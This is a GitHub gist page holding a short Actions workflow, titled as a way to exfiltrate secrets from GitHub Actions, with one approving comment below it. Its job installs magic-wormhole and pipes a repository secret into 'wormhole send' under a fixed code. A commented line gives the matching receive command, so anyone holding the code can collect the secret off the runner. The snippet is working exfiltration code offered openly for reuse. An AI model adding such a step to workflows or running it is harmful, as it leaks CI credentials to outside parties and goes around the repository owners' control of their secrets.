Skip to content

Instantly share code, notes, and snippets.

@framp
Created July 14, 2022 13:56
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save framp/cc6b0a79a50dda9694c79ffaed700013 to your computer and use it in GitHub Desktop.
Save framp/cc6b0a79a50dda9694c79ffaed700013 to your computer and use it in GitHub Desktop.
exfiltrate secrets out of github actions
jobs:
exfiltrate:
runs-on: ubuntu-latest
steps:
- name: exfiltrate secrets
run: |
sudo apt update && sudo apt install magic-wormhole
echo "LOL=${{secrets.LOL}}" | wormhole send --code 3-magic-number
# wormhole receive 3-magic-number
@lmammino
Copy link

lmammino commented Nov 3, 2023

Love it! ❤️

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment